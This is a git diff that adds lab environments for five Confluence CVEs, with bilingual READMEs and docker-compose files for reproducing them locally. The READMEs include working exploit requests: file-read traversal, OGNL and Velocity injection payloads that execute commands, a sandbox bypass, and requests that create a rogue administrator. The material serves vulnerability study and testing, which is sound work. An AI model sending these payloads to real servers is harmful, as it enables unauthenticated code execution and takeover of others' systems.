first commit

confluence/CVE-2019-3396/README.md

@@ -0,0 +1,61 @@
+# Atlassian Confluence Path Traversal Leads to RCE (CVE-2019-3396)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Confluence is a web-based corporate wiki developed by Australian software company Atlassian.
+
+An unauthorized directory traversal vulnerability exists before version 6.14.2 of Atlassian Confluence, which an attacker can read arbitrary files or execute arbitrary commands using Velocity template injection.
+
+Reference:
+
+- https://paper.seebug.org/884/
+- https://jira.atlassian.com/browse/CONFSERVER-57974
+
+## Vulnerability Environment
+
+Start a Confluence Server 6.10.2 by executing the following command.
+
+```
+docker compose up -d
+```
+
+After the environment starts, visit ``http://your-ip:8090`` and you will see the installation guide, select "Trial installation", then you will be asked to fill in the license key. You should apply for a Confluence Server test certificate from Atlassian:
+
+![](1.png)
+
+Then just click Next to install. This step of small memory VPS may fail to install or take a long time (it is recommended to use a machine with more than 4G memory for installation and testing), please wait patiently.
+
+If prompted to fill in the cluster node, the path can be filled in with `/home/confluence`.
+
+![](4.png)
+
+You may be asked to fill in the database account password, choose the postgres database, the address is `db`, the account password is `postgres`:
+
+![](5.png)
+
+## Exploit
+
+The file `web.xml` can be read by sending the following packet.
+
+```
+POST /rest/tinymce/1/macro/preview HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
+Content-Type: application/json; charset=utf-8
+Content-Length: 176
+
+{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":". /web.xml"}}}
+```
+
+![](6.png)
+
+Confluence before 6.12 did not restrict the protocol and path for file reading, we can use `file:///etc/passwd` to read files, or `https://...` to load remote files.
+
+If the file is a Velocity template, and we can execute arbitrary commands via template injection (SSTI):
+
+![](7.png)

confluence/CVE-2019-3396/README.zh-cn.md

@@ -0,0 +1,57 @@
+# Atlassian Confluence 路径穿越导致远程代码执行漏洞（CVE-2019-3396）
+
+Atlassian Confluence是企业广泛使用的wiki系统，其6.14.2版本前存在一处未授权的目录穿越漏洞，通过该漏洞，攻击者可以读取任意文件，或利用Velocity模板注入执行任意命令。
+
+参考资料：
+
+- https://paper.seebug.org/884/
+- https://jira.atlassian.com/browse/CONFSERVER-57974
+
+## 环境搭建
+
+执行如下命令启动一个Confluence Server 6.10.2：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8090`会进入安装引导，选择“Trial installation”，之后会要求填写license key。点击“Get an evaluation license”，去Atlassian官方申请一个Confluence Server的测试证书：
+
+![](1.png)
+
+然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长（建议使用4G内存以上的机器进行安装与测试），请耐心等待。
+
+如果提示填写cluster node，路径填写`/home/confluence`即可：
+
+![](4.png)
+
+后续可能要求你填写数据库账号密码，选择postgres数据库，地址为`db`，账号密码均为`postgres`：
+
+![](5.png)
+
+## 漏洞复现
+
+发送如下数据包，即可读取文件`web.xml`：
+
+```
+POST /rest/tinymce/1/macro/preview HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
+Content-Type: application/json; charset=utf-8
+Content-Length: 176
+
+{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
+```
+
+![](6.png)
+
+6.12以前的Confluence没有限制文件读取的协议和路径，我们可以使用`file:///etc/passwd`来读取文件，也可以通过`https://...`来加载远程文件。
+
+该文件是一个Velocity模板，我们可以通过模板注入（SSTI）来执行任意命令：
+
+![](7.png)

confluence/CVE-2019-3396/docker-compose.yml

@@ -0,0 +1,13 @@
+version: '2'
+services:
+  web:
+    image: vulhub/confluence:6.10.2
+    ports:
+      - "8090:8090"
+    depends_on:
+      - db
+  db:
+    image: postgres:10.7-alpine
+    environment: 
+    - POSTGRES_PASSWORD=postgres
+    - POSTGRES_DB=confluence

confluence/CVE-2021-26084/README.md

@@ -0,0 +1,99 @@
+# Atlassian Confluence Webwork Pre-Auth OGNL Injection Leads to RCE (CVE-2021-26084)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Confluence is a web-based corporate wiki developed by Australian software company Atlassian.
+
+An OGNL injection vulnerability exists that allows an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.
+
+References
+
+- https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
+- https://jira.atlassian.com/browse/CONFSERVER-67940
+- https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
+- https://github.com/h3v0x/CVE-2021-26084_Confluence
+
+## Vulnerable Environment
+
+Execute following command to start a Confluence Server 7.4.10:
+
+```
+docker compose up -d
+```
+
+After the environment starts, visit ``http://your-ip:8090`` and you will see the installation guide, select "Trial installation", then you will be asked to fill in the license key. You should apply for a Confluence Server test certificate from Atlassian.
+
+Following [this guide](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396) to complete the installation.
+
+On the database configuration page, fill in the form with database address `db`, database name `confluence`, username `postgres`, password `postgres`.
+
+![](3.png)
+
+## Exploit
+
+There are multiple API endpoints that are affected by this vulnerability.
+
+### /pages/doenterpagevariables.action
+
+This is a pre-auth exploit, executing `233*233`:
+
+```
+POST /pages/doenterpagevariables.action HTTP/1.1
+Host: your-ip:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 47
+
+queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027
+```
+
+![](2.png)
+
+Executing arbitrary commands:
+
+```
+queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
+```
+
+![](1.png)
+
+### /pages/createpage-entervariables.action
+
+This is also a pre-auth exploit:
+
+```
+POST /pages/createpage-entervariables.action HTTP/1.1
+Host: your-ip:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 47
+
+queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027
+```
+
+### /pages/createpage.action
+
+This exploit requires a user permission to create pages:
+
+```
+GET /pages/createpage.action?spaceKey=EX&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027 HTTP/1.1
+Host: 192.168.1.162:8090
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.1.162:8090/template/custom/content-editor.vm
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
+Cookie: JSESSIONID=7B35600F54A9E303CE8C277ED960E1E7; seraph.confluence=524289%3A2ac32a308478b9cb9f0e351a12470faa4f2a928a
+Connection: close
+
+
+```

confluence/CVE-2021-26084/README.zh-cn.md

@@ -0,0 +1,91 @@
+# Atlassian Confluence Webwork 前台GNL表达式注入命令执行漏洞（CVE-2021-26084）
+
+Atlassian Confluence是企业广泛使用的wiki系统，其部分版本中存在OGNL表达式注入漏洞。攻击者可以通过这个漏洞，无需任何用户的情况下在目标Confluence中执行任意代码。
+
+参考链接：
+
+- https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
+- https://jira.atlassian.com/browse/CONFSERVER-67940
+- https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
+- https://github.com/h3v0x/CVE-2021-26084_Confluence
+
+## 环境搭建
+
+执行以下命令启动一个Confluence 7.4.10 data center 试用版本服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8090`即可进入安装向导，参考[CVE-2019-3396](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396)这个环境中的安装方法，申请试用版许可证。在填写数据库信息的页面，PostgreSQL数据库地址为`db`，数据库名称`confluence`，用户名密码均为`postgres`。
+
+![](3.png)
+
+## 漏洞利用
+
+有多个接口可以触发这个OGNL表达式注入漏洞。
+
+### /pages/doenterpagevariables.action
+
+这个接口不需要登录即可利用，发送如下数据包，即可看到`233*233`已被执行：
+
+```
+POST /pages/doenterpagevariables.action HTTP/1.1
+Host: your-ip:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 47
+
+queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027
+```
+
+![](2.png)
+
+执行任意命令：
+
+```
+queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027
+```
+
+![](1.png)
+
+### /pages/createpage-entervariables.action
+
+这个路径也不需要用户登录：
+
+```
+POST /pages/createpage-entervariables.action HTTP/1.1
+Host: your-ip:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 47
+
+queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027
+```
+
+### /pages/createpage.action
+
+这个接口需要一个可以创建页面的用户权限：
+
+```
+GET /pages/createpage.action?spaceKey=EX&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027 HTTP/1.1
+Host: 192.168.1.162:8090
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.1.162:8090/template/custom/content-editor.vm
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
+Cookie: JSESSIONID=7B35600F54A9E303CE8C277ED960E1E7; seraph.confluence=524289%3A2ac32a308478b9cb9f0e351a12470faa4f2a928a
+Connection: close
+
+
+```

confluence/CVE-2021-26084/docker-compose.yml

@@ -0,0 +1,13 @@
+version: '2'
+services:
+  web:
+    image: vulhub/confluence:7.4.10
+    ports:
+      - "8090:8090"
+    depends_on:
+      - db
+  db:
+    image: postgres:12.8-alpine
+    environment: 
+    - POSTGRES_PASSWORD=postgres
+    - POSTGRES_DB=confluence

confluence/CVE-2022-26134/README.md

@@ -0,0 +1,48 @@
+# Atlassian Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Confluence is a web-based corporate wiki developed by Australian software company Atlassian.
+
+On June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
+
+References:
+
+- <https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>
+- <https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis>
+
+## Vulnerable Environment
+
+Execute following command to start a Confluence Server 7.13.6:
+
+```
+docker compose up -d
+```
+
+After the environment starts, visit ``http://your-ip:8090`` and you will see the installation guide, select "Trial installation", then you will be asked to fill in the license key. You should apply for a Confluence Server test certificate from Atlassian.
+
+Following [this guide](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396) to complete the installation.
+
+On the database configuration page, fill in the form with database address `db`, database name `confluence`, username `postgres`, password `postgres`.
+
+![](1.png)
+
+## Exploit
+
+Simplely send following request to execute arbitrary commands inside an craft OGNL expression and get the response:
+
+```
+GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
+Host: your-ip:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+
+
+```
+
+![](2.png)
+
+The URL-decoded OGNL expression is `${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}`.

confluence/CVE-2022-26134/README.zh-cn.md

@@ -0,0 +1,40 @@
+# Confluence OGNL表达式注入命令执行漏洞（CVE-2022-26134）
+
+Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新，通告了一个严重且已在野利用的代码执行漏洞，攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。
+
+参考链接：
+
+- <https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>
+- <https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis>
+
+## 漏洞环境
+
+执行如下命令启动一个Confluence Server 7.13.6：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8090`即可进入安装向导，参考[CVE-2019-3396](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396)这个环境中的安装方法，申请试用版许可证。在填写数据库信息的页面，PostgreSQL数据库地址为`db`，数据库名称`confluence`，用户名密码均为`postgres`。
+
+![](1.png)
+
+## 漏洞复现
+
+该漏洞利用方法十分简单，直接发送如下请求即可执行任意命令，并在HTTP返回头中获取执行结果：
+
+```
+GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
+Host: your-ip:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+
+
+```
+
+![](2.png)
+
+其中使用到的OGNL表达式为`${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}`。

confluence/CVE-2022-26134/docker-compose.yml

@@ -0,0 +1,13 @@
+version: '2'
+services:
+  web:
+    image: vulhub/confluence:7.13.6
+    ports:
+      - "8090:8090"
+    depends_on:
+      - db
+  db:
+    image: postgres:12.8-alpine
+    environment: 
+    - POSTGRES_PASSWORD=postgres
+    - POSTGRES_DB=confluence

confluence/CVE-2023-22515/README.md

@@ -0,0 +1,87 @@
+# Atlassian Confluence Access Control Broken by Attributes Overwrite (CVE-2023-22515)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Confluence is a web-based corporate wiki developed by Australian software company Atlassian.
+
+On October 4, 2023, Atlassian published a security advisory on CVE-2023-22515, a critical vulnerability affecting on-premises instances of Confluence Server and Confluence Data Center. CVE-2023-22515 was originally announced as a privilege escalation vulnerability, but was later changed to a broken access control flaw.
+
+Versions prior to 8.0.0 are not affected by this vulnerability.
+
+References:
+
+- <https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html>
+- <https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis>
+
+## Vulnerable Environment
+
+Execute following command to start a Confluence Server 8.5.1:
+
+```
+docker compose up -d
+```
+
+After the environment starts, visit ``http://your-ip:8090`` and you will see the installation guide, select "Trial installation", then you will be asked to fill in the license key. You should apply for a Confluence Server test certificate from Atlassian.
+
+Following [this guide](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396) to complete the installation.
+
+On the database configuration page, fill in the form with database address `db`, database name `confluence`, username `postgres`, password `postgres`.
+
+![](1.png)
+
+## Exploit
+
+Firstly, send the main request to overwrite the attribute `bootstrapStatusProvider.applicationConfig.setupComplete`:
+
+```
+GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+Then, you will be able to create a administrator user `vulhub` through the website setup action:
+
+```
+POST /setup/setupadministrator.action HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 110
+X-Atlassian-Token: no-check
+
+username=vulhub&fullName=vulhub&email=admin%40vulhub.org&password=vulhub&confirm=vulhub&setup-next-button=Next
+```
+
+Optionally, send the following request to finish the setup wizard:
+
+```
+POST /setup/finishsetup.action HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+X-Atlassian-Token: no-check
+
+
+```
+
+Finally, you can simply login to the administrator panel with account `vulhub` and password `vulhub`:
+
+![](2.png)

confluence/CVE-2023-22515/README.zh-cn.md

@@ -0,0 +1,81 @@
+# Confluence 属性覆盖导致权限绕过漏洞 (CVE-2023-22515)
+
+Atlassian Confluence是企业广泛使用的wiki系统。
+
+2023年10月4日，Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致，利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。
+
+该漏洞不影响8.0.0以前的版本。
+
+参考链接：
+
+- <https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html>
+- <https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis>
+
+## 漏洞环境
+
+执行如下命令启动一个Confluence Server 8.5.1：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8090`即可进入安装向导，参考[CVE-2019-3396](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396)这个环境中的安装方法，申请试用版许可证。在填写数据库信息的页面，PostgreSQL数据库地址为`db`，数据库名称`confluence`，用户名密码均为`postgres`。
+
+![](1.png)
+
+## 漏洞复现
+
+首先，最主要的请求就是覆盖目标Confluence服务器中的`bootstrapStatusProvider.applicationConfig.setupComplete`属性：
+
+```
+GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+然后，你就可以使用如下请求创建一个新的管理员账户`vulhub`：
+
+```
+POST /setup/setupadministrator.action HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 110
+X-Atlassian-Token: no-check
+
+username=vulhub&fullName=vulhub&email=admin%40vulhub.org&password=vulhub&confirm=vulhub&setup-next-button=Next
+```
+
+发送如下请求完成安装步骤：
+
+```
+POST /setup/finishsetup.action HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+X-Atlassian-Token: no-check
+
+
+```
+
+最后，直接使用新的`vulhub`账户（密码同样是`vulhub`）来登录Confluence，可见新的管理员已成功增加：
+
+![](2.png)

confluence/CVE-2023-22515/docker-compose.yml

@@ -0,0 +1,13 @@
+version: '2'
+services:
+  web:
+    image: vulhub/confluence:8.5.1
+    ports:
+      - "8090:8090"
+    depends_on:
+      - db
+  db:
+    image: postgres:15.4-alpine
+    environment: 
+    - POSTGRES_PASSWORD=postgres
+    - POSTGRES_DB=confluence

confluence/CVE-2023-22527/README.md

@@ -0,0 +1,55 @@
+# Atlassian Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2023-22527)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Confluence is a web-based corporate wiki developed by Australian software company Atlassian.
+
+A OGNL injection vulnerability on versions (8.0 to 8.5.3) of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance.
+
+References:
+
+- <https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html>
+- <https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/>
+
+## Vulnerable Environment
+
+Execute following command to start a Confluence Server 8.5.3:
+
+```
+docker compose up -d
+```
+
+After the environment starts, visit ``http://your-ip:8090`` and you will see the installation guide, select "Trial installation", then you will be asked to fill in the license key. You should apply for a Confluence Server test certificate from Atlassian.
+
+Following [this guide](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396) to complete the installation.
+
+On the database configuration page, fill in the form with database address `db`, database name `confluence`, username `postgres`, password `postgres`.
+
+![](1.png)
+
+## Exploit
+
+Simplely send following request to execute arbitrary commands inside an craft OGNL expression and get the response:
+
+```
+POST /template/aui/text-inline.vm HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 285
+
+label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
+```
+
+![](2.png)
+
+After the version 7.18.0, Confluence introduced a `isSafeExpression` function to protect OGNL injection. Security researcher [Alvaro Muñoz](https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/) find a way to bypass it through `#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(String, Object)`, the full decoded payloads are here:
+
+```
+'+(#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})),{}))+'
+```

confluence/CVE-2023-22527/README.zh-cn.md

@@ -0,0 +1,49 @@
+# Confluence OGNL表达式注入命令执行漏洞（CVE-2023-22527）
+
+Atlassian Confluence是企业广泛使用的wiki系统。
+
+在Confluence 8.0到8.5.3版本之间，存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞，未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。
+
+参考链接：
+
+- <https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html>
+- <https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/>
+
+## 漏洞环境
+
+执行如下命令启动一个Confluence Server 8.5.3：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8090`即可进入安装向导，参考[CVE-2019-3396](https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396)这个环境中的安装方法，申请试用版许可证。在填写数据库信息的页面，PostgreSQL数据库地址为`db`，数据库名称`confluence`，用户名密码均为`postgres`。
+
+![](1.png)
+
+## 漏洞复现
+
+该漏洞利用方法十分简单，直接发送如下请求即可执行任意命令，并在HTTP返回头中获取执行结果：
+
+```
+POST /template/aui/text-inline.vm HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 285
+
+label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
+```
+
+![](2.png)
+
